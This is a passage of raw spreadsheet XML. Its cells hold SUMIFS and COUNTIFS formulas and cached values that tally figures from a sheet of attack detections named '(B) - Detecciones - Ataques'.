        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI34,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S32 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EL55" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI34,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S32 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EM55" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI34,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S32 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EN55" s="360">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="EO55" s="364"/>
      <c r="EP55" s="456">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="EQ55" s="457">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="ER55" s="427">
        <f t="shared" si="42"/>
        <v>1</v>
      </c>
      <c r="ES55" s="427">
        <f t="shared" si="43"/>
        <v>1</v>
      </c>
      <c r="ET55" s="427">
        <f t="shared" si="48"/>
        <v>1</v>
      </c>
      <c r="EU55" s="271"/>
      <c r="EV55" s="358" t="s">
        <v>244</v>
      </c>
      <c r="EW55" s="465">
        <f t="shared" ref="EW55:EZ55" si="49">IF(EJ33=0,"-",EJ54/EJ33)</f>
        <v>0</v>
      </c>
      <c r="EX55" s="465">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="EY55" s="465">
        <f t="shared" si="49"/>
        <v>0.2857142857</v>
      </c>
      <c r="EZ55" s="466">
        <f t="shared" si="49"/>
        <v>0.09677419355</v>
      </c>
      <c r="FA55" s="280"/>
      <c r="FK55" s="445"/>
      <c r="FL55" s="359"/>
      <c r="FM55" s="359"/>
      <c r="FN55" s="359"/>
      <c r="FO55" s="359"/>
      <c r="FP55" s="359"/>
      <c r="FY55" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="FZ55" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*"))</f>
        <v>0.08386775763</v>
      </c>
      <c r="GA55" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*"))</f>
        <v>0.1052631579</v>
      </c>
      <c r="GC55" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="GD55" s="368">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*"))</f>
        <v>0.2417624945</v>
      </c>
      <c r="GE55" s="369">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*"))</f>
        <v>0.2631578947</v>
      </c>
    </row>
    <row r="56">
      <c r="J56" s="277"/>
      <c r="K56" s="434"/>
      <c r="L56" s="353"/>
      <c r="M56" s="353"/>
      <c r="N56" s="354"/>
      <c r="O56" s="278"/>
      <c r="Q56" s="271"/>
      <c r="R56" s="352" t="s">
        <v>2522</v>
      </c>
      <c r="S56" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="T56" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="U56" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>15</v>
      </c>
      <c r="V56" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>8</v>
      </c>
      <c r="W56" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X56" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Y56" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>396</v>
      </c>
      <c r="Z56" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>7393</v>
      </c>
      <c r="AA56" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>15</v>
      </c>
      <c r="AB56" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>20</v>
      </c>
      <c r="AC56" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="AD56" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>23</v>
      </c>
      <c r="AE56" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>37</v>
      </c>
      <c r="AF56" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="AG56" s="271"/>
      <c r="AH56" s="352" t="s">
        <v>2522</v>
      </c>
      <c r="AI56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>5</v>
      </c>
      <c r="AJ56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>1</v>
      </c>
      <c r="AL56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>1</v>
      </c>
      <c r="AN56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>2</v>
      </c>
      <c r="AR56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>4</v>
      </c>
      <c r="AS56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>3</v>
      </c>
      <c r="AU56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>4</v>
      </c>
      <c r="AV56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>8</v>
      </c>
      <c r="AY56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>0</v>
      </c>
      <c r="BA56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>1</v>
      </c>
      <c r="BD56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>396</v>
      </c>
      <c r="BI56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>0</v>
      </c>
      <c r="BM56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>612</v>
      </c>
      <c r="BN56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>6781</v>
      </c>
      <c r="BO56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>0</v>
      </c>
      <c r="BT56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>10</v>
      </c>
      <c r="CA56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>0</v>
      </c>
      <c r="CG56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>8</v>
      </c>
      <c r="CL56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>3</v>
      </c>
      <c r="CN56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>1</v>
      </c>
      <c r="CP56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
